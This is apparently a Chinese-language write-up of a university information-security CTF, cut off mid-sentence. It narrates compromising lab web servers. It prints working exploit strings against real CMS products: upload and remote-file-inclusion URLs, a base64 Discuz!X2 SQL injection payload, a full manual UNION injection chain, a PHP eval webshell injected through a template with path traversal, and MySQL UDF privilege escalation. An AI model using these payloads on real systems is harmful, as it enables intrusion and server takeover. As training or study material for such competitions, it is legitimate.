渗透比赛过程

某大学信息安全大赛渗透题目过程第五关dzx1.5getshell第六关织梦远程变量覆盖拿到webshel使用的是弱口令第七关听说能通过数据库查询出管理员密码，好神奇啊，找到密码，再在webshell里找key其实就是ASPCMS2.4那个正式版，数据库是data/data.asp,下载回来，查询密码然后直接/admin/可以登录，添加模版为xx.asp;写入一句话，得到webshell，找到KEY第八关就是乔客的上传漏洞很好利用，l可以这样common/upload.asp?channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=，然后上传xx.asa就可以拿到shell了第九关就是phpwind7.5的远程文件包含漏洞apps/groups/index.php?route=groups&basePath=写入一句话，在菜刀里面去连接然后就是web12系列提示是IDEACMS，然后旁边的是admin%5Fd57d随后在url后面加上admin%5Fd57d就进入后台了,然后测试admintesttest在后台的管理角落找到KEYWeb11系列存在fck，可以新建1.asp，上传图片就可以得到shell然后下面一道题是通过web13进入后台后，找到mysql的连接密码，连接上mysql，通过udf进行提权，提权后，直接在cmdshell里操作，dos命令下进入桌面，然后复制桌面上的key到web目录，拖回本地，okWeb2系列，web2的第一题就是让我们找到后台路径，那么我们开始吧打开这个网站如下图：这个是discuzx2搭建的站，找后台还不简单啊，直接后面加admin.php直接就来到了后台登陆页面，心里一喜，如此简单，但是提交key的时候才发现并不是这么简单，难道是要进入后台才有线索吗？我继续尝试着，点开几个页面也没发现奇怪的地方，网上找了下相关的漏洞，Discuz!X2在处理请求数据时存在SQL注入漏洞，远程攻击者可利用此漏洞非授权操作数据库，找到了相关的exp为=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D连续好几天，尝试了各种爆出的漏洞，还是不行，于是我再次打开页面，仔细看每个可能提供线索的信息，于是我找到了如下的这个页面。这里是admin发布的一条信息，pleaselookthepathcarefully!!，，要我注意路径，我静下来好好想想，难道是有隐藏的东西，真实的路径未必是眼前这个路径，我用工具扫啊扫，在web2.myclover.org目录下居然扫到了一个/blog目录，顿时让我泪流满面，好狡猾啊···，于是我打开，出现如下图所示的页面：看见了吧，终于揭开了题目的庐山真面目，可能就是找这个站的后台路径吧，我还是下意识的在后面加上admin，来到后台登陆页面，如下图做的很简单，试试弱口令adminadmin，进入后台···，让我吃惊的是这个后台是这样的，这什么意思···，出题的人也太猥琐了吧，还带这样的，通过多方打听，终于社工到上面的信息，回到这个登陆页面，将社工到的两个信息分别输入进去，然后就得到了如下图：查看网页的源代码得到这样的提示：Itisjustthefirststep!!--thesecondstepishere:=1--至此，我对出题人那浪漫的想象力完全折服，好吧，进入第二步，打开提示的页面，看标题，这是一道sql的注入题，随便测试了下，让AriticleID=-1，返回报错，、应该可以确定是注入了，专门出一道注入的题，不可能用工具能跑出来吧，于是我根本没用工具去跑，直接用我们勤劳的双手啊，先去查询有多少个字段，=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8爆出来的是8个字段，可以看到Content:6这里，所以我们替换6的查询语句，=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir),7,8通过group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir，爆出数据库版本，数据库名和链接信息，如下图：在提交：=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(SCHEMA_NAME),7,8/**/from/**/information_schema.schemata这是为了得到所有的数据库，如图：得到了两个数据库，这里我们只关心我们需要的mysqlinjection，下面继续爆当前库的表明和字段内容：=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(table_name),7,8/**/from/**/information_schema.tables/**/where/**/table_schema=database()--如下图，爆出表名：发现x3389_admin比较吸引人，继续下去，爆字段，提交：=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(column_name),7,8/**/from/**/information_schema.columns/**/where/**/table_name=0x78333338395F61646D696E--（这儿要注意下，就是talbe_name一定要转换成16进制的，不然会出错）得到如下图：可以看见得到了3个字段，就是id,Admin_Path,Admin_Pass，嘿嘿，发现了吗，有个path_admin，这个不就是我们想要的后台路径吗，继续爆内容。提交：=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(id,0x5e5e,Admin_Path,0x5e5e,Admin_Pass),7,8/**/from/**/x3389_admin爆出各自的值，如下图：看见了吧，不仅找到了路径为supersystem，还找到了admind的密码，用base64解密后得到，W0legequ0提交如下路径：=pre_login如图：成功进入后台，该后台是采用Simple-Log的系统管理后台，上图：谷歌上搜索得知，改后台可以通过修改模板写入一句话，进而得到shell，我们在自定义网站模板那儿添加一句话，{php}fwrite(fopen('1.php',w),'?phpeval($_POST[pass])?');{/php}按照我们的预期，就应该是在网站根目录下产生一个1.php的一句话木马，但是修改后产生了错误，什么情况，无法打开文件，顿时傻×了，我们将该系统的源代码下载下来，找到相应的漏洞页面，这里没有作任何安全措施，我们可截取template，然后修改他的值，将一句话传入到一个可写的目录下，我们改成template_file=../../1.php，利用的是WebScarab,使用WebScarab之前要使用代理，设置成127.0.0.1:8008,然后打开WebScarab，点击下图中的修改将抓到的包进行修改，然后accepts，提示修改成功，我们成功将一句话添加到../../的目录下，利用菜刀直接连接，得到shell，如图：在目录下也找到了我们想要的那个key，接下来就是提权了，由于是php的站，用的mysql的数据库，在目录下随意的翻着，找到了题目的下一个难题，一个逆向的exe，逆向这儿我就不说，下面会细说，逆向后得到的就是root的密码，接下来，上传一个udf的提权马，用户名为root,密码为逆向后得到的密码，输入进去后，导入udf.dll，然后创建函数createfunctioncmdshellreturnsstringsoname'udf.dll';，创建函数成功，接下来就可以添加用户，并添加到管理组了，由于实验室的内网，无法登陆到3389，故意跑回寝室，用寝室的网才成功登陆远程，进入到服务器后，剩下最后的任务就是找到那个key，题目提示是在某个攻击者经常访问的地方，我把常用的地方都找了个遍，都没找到，于是没办法，只有一个一个的去翻，终于在下图这个目录找到了，Web3系列这几道题的提示是最模糊的，让我最头痛的就是这个，web3_1题目如下：唯一的提示就是web3上装有tomcat，tomcat一般都是和jsp组合的，jsp是我们接触的最少的一类型网站，没办法，先看能扫出web3的地址吗，这次我用的是bt5里的nmap，感觉比windows下的nmap要详细一些，而且参数方面，更直观一点，看见了吗，8080端口上有tomcat的服务，而且整个网段就只有这一台机器上有tomcat的服务，由此可以确定，这个就是web3对应的服务器了，其对应的ip即是222.18.158.235而tomcat的服务端口又是8080,我们在浏览器上直接打开，得到如下图的页面：有test1和test2两个页面，打开test1页面，是个简单的登录页面:需要输入id和密码才能登录，test2页面如下：这个页面也就是一些基本的信息，由于是Jsp的站，完全没有头绪，百度了几天还和一群一点都不懂jsp的朋友讨论了很久，先是找到了tomcat服务的登录页面又是需要账户密码，我自己的思路可能是弱口令吧，下载了暴力破解tomcat的工具，跑了一天，没有任何进展这个没有办法入手后，我又换到了test1的那个登录页面，我想这么简单的登录页面，应该能爆破，于